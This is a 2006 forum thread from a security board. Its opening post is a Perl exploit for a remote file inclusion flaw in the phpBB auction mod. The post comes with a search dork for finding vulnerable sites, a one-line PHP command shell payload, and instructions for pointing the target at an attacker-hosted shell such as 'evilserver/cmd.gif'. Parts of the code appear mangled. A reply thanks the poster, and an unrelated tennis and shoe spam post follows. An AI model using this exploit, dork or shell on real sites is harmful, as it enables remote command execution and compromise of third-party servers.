Government Security
Network Security Resources

Jump to content


Phpbb Auction Mod V1.3 Exploit

  • Please log in to reply
2 replies to this topic

#1 webdevil


    Retired GSO General

  • Sergeant Major
  • 1,195 posts

Posted 04 May 2006 - 09:59 AM

#phpBB auction mod - Remote File Inclusion Vuln
# Bug discovered by VietMafia
# code copier: webDEViL w3bd3vil[at]
#code same as Fast Click <= 2.3.8 Remote File Inclusion exploit
# dork: intext:"phpbb - auction" inurl:"auction"
# usage:
# perl <target> <cmd shell location> <cmd shell variable>
# perl cmd
# cmd shell example: <?system($cmd);?>
# cmd shell variable: ($_GET[cmd]);

use LWP::UserAgent;

$Path = $ARGV[0];
$Pathtocmd = $ARGV[1];
$cmdv = $ARGV[2];

if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv){usage()}


print "[shell] \$";

$xpl = LWP::UserAgent->new() or die;
$req = HTTP::Request->new(GET =>$Path.'/auction/auction_common.php?phpbb_root_path='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die "\nCould Not connect\n";

$res = $xpl->request($req);
$return = $res->content;
$return =~ tr/[\n]/[]/;

if (!$cmd) {print "\nPlease Enter a Command\n\n"; $return ="";}

elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot execute a blank command in <b>/)
{print "\nCould Not Connect to cmd Host or Invalid Command Variable\n";exit}
elsif ($return =~/^<br.\/>.<b>Fatal.error/) {print "\nInvalid Command or No Return\n\n"}

if($return =~ /(.*)/)

$finreturn = $1;
$finreturn=~ tr/[]/[\n]/;
print "\r\n$finreturn\n\r";

else {print "[shell] \$";}}}last;

sub head()
print "\n==========================================================================
print " phpBB auction mod - Remote File Inclusion Vuln\r\n";
print "===========================================================================
sub usage()
print " Usage: perl <target> <cmd shell location> <cmd shell variable>\r\n\n";
print " <Site> - Full path to phpBB auction ex: or \r\n";
print " <cmd shell> - Path to cmd Shell e.g http://evilserver/cmd.gif \r\n";
print " <cmd variable> - Command variable used in php shell \r\n";
print "===========================================================================
print " webDEViL w3bd3vil[at] \r\n";
print "===========================================================================

#2 dingdongfromu



  • Members
  • 9 posts

Posted 04 May 2006 - 10:30 AM

Nice job, Thanks


#3 federes



  • Members
  • 1 posts

Posted 02 February 2013 - 09:55 PM

British number one Heather Watson suffered a surprise defeat to Anastasija Sevastova in the second round of the Pattaya Open wear federer shoes. The Latvian is ranked 143 places below 20-year-old Watson, who this week achieved a career high ranking of 40. Sevastova won a first set tie-break and broke Watson's serve three times in the third set to win 7-6 (7-4), 4-6, 6-2. Watson was seeded eighth in Thailand after a run to the third round at the Australian Open wear nike zoom vapor 9 tour. Sevastova signalled her intent right from the start, breaking Watson's serve in the first game of the match. Despite breaking back immediately, the young Brit was beaten comfortably in the tie break as Sevastova took a one-set lead. Watson was able to level the match after a decisive break in the the ninth game of the second set wear nike zoom vapor 9 club. But she was only able to hold her serve once in the final set, and although Sevastova faltered when serving for the match, the Latvian wrapped up the victory on Watson's serve after two hours and 26 minutes. Top seed Ana Ivanovic wear nike zoom vapor 8 club of Serbia was also knocked out, losing 3-6, 7-5, 3-6 to Japan's Ayumi Morita in a first-round match delayed by rain.

0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users